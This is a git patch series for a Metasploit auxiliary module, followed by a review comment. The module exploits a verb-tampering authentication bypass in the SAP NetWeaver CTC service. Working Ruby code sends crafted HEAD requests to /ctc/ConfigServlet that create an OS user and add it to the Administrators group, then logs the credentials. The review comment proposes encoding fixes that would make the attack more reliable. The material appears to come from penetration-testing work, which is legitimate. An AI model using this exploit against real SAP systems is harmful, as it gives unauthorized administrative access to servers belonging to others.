From 7823df0478610c8f071daddd7c43ad25e6367b2a Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 16 May 2013 10:41:25 -0500
Subject: [PATCH 1/2] Change module filename
---
 ...d_user_and_add_role.rb => sap_ctc_verb_tampering_user_mgmt.rb} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/auxiliary/scanner/sap/{sap_ctc_verb_tampering_add_user_and_add_role.rb => sap_ctc_verb_tampering_user_mgmt.rb} (100%)
diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb
similarity index 100%
rename from modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb
rename to modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb
From c21035c0b9fdba52d5a1eead2fc267812bddd2a9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 16 May 2013 10:42:09 -0500
Subject: [PATCH 2/2] Add final cleanup for sap_ctc_verb_tampering_user_mgmt
---
 .../sap/sap_ctc_verb_tampering_user_mgmt.rb | 89 ++++++++++++-------
 1 file changed, 59 insertions(+), 30 deletions(-)
diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb
index 039910da90..146ff05f91 100644
--- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb
+++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb
@@ -31,49 +31,78 @@ class Metasploit4 < Msf::Auxiliary def initialize super( - 'Name' => 'SAP CTC Service Verb Tampering (add user and add role)', + 'Name' => 'SAP CTC Service Verb Tampering User Management', 'Description' => %q{ - This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service. - The service is vulnerable to verb tampering and allows for unauthorised user management. - SAP Note 1589525, 1624450 / DSECRG-11-041. - }, - 'References' => [['URL','http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/']], - 'Author' => ['nmonkee'], + This module exploits an authentication bypass vulnerability in SAP NetWeaver + CTC service. The service is vulnerable to verb tampering allowing for unauthorised + OS user management. Information about resolution should be available at SAP notes + 1589525 and 1624450 (authentication required). + }, + 'References' => + [ + [ 'URL', 'http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/' ], + [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf' ] + ], + 'Author' => + [ + 'Alexandr Polyakov', # Vulnerability discovery + 'nmonkee' # Metasploit module + ], 'License' => MSF_LICENSE - ) + ) register_options([ - OptString.new('USER', [true, 'Username', nil]), - OptString.new('PASS', [true, 'Password', nil]), - OptString.new('GROUP', [true, 'Group', nil]) - ], self.class) + Opt::RPORT(50000), + OptString.new('USERNAME', [true, 'Username to create', 'msf']), + OptString.new('PASSWORD', [true, 'Password for the new user', '$Metasploit1234$']), + OptString.new('GROUP', [true, 'Group for the new user', 'Administrators']) + ], self.class) end def run_host(ip) - uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USER'] + ',PASSWORD=' + datastore['PASS'] - send_request(uri) - uri = 
'/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USER'] + ',GROUPNAME=' + datastore['GROUP'] - send_request(uri) + vprint_status("#{rhost}:#{rport} - Creating User...") + uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USERNAME'] + ',PASSWORD=' + datastore['PASSWORD'] + if send_request(uri) + print_good("#{rhost}:#{rport} - User #{datastore['USERNAME']} with password #{datastore['PASSWORD']} successfully created") + else + return + end + + vprint_status("#{rhost}:#{rport} - Adding User to Group...") + uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USERNAME'] + ',GROUPNAME=' + datastore['GROUP'] + if send_request(uri) + print_good("#{rhost}:#{rport} - User #{datastore['USERNAME']} added to group #{datastore['GROUP']}") + else + return + end + + report_auth_info( + :host => rhost, + :port => rport, + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], + :ptype => "password", + :active => true + ) end def send_request(uri) begin - print_status("[SAP] #{rhost}:#{rport} - sending request") - res = send_request_raw({ + res = send_request_cgi({ 'uri' => uri, 'method' => 'HEAD', - 'headers' =>{ - 'Cookie' => 'sap-usercontext=sap-language=EN', - 'Content-Type' => 'text/xml; charset=UTF-8',} - }, 45) - if res - vprint_error("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s) - vprint_error("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s) - vprint_error("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s) - end - rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} - Unable to connect") - return + 'ctype' => 'text/xml; charset=UTF-8', + 'cookie' => 'sap-usercontext=sap-language=EN' + }) + if res and res.code == 200 and res.headers['Server'] =~ /SAP J2EE Engine/ + return true + elsif res + vprint_error("#{rhost}:#{rport} - Unexpected Response: #{res.code} #{res.message}") + return 
false end + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Unable to connect") + return false end end +end
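Review bot: The two `uri` assignments in run_host splice datastore['USERNAME'], datastore['PASSWORD'] and datastore['GROUP'] into the query string with plain `+` concatenation and no URI-encoding, so a value containing `&`, `#`, `%`, a space, or the servlet's own `,`/`;` separators produces a malformed or differently-parsed request while the module can still report success on a 200; wrapping each value, e.g. `'USERNAME=' + Rex::Text.uri_encode(datastore['USERNAME']) + ',PASSWORD=' + Rex::Text.uri_encode(datastore['PASSWORD'])`, keeps the operator's input intact on both requests. Related: the success test in send_request (`res.code == 200` plus a `Server` header match on a HEAD) only shows the servlet accepted the tampered verb, not that the user or group change was applied, yet run_host prints `print_good` and records the credentials via report_auth_info with `:active => true`, so a comment stating that limitation, or a follow-up verification before reporting, would avoid logging credentials that may not work. Style: `if res and res.code == 200 and ...` should use `&&`, and each `if send_request(uri) ... else return end` pair reads more naturally as `return unless send_request(uri)`. The enclosing class Metasploit4 opens before the hunk; the three methods themselves are complete within it.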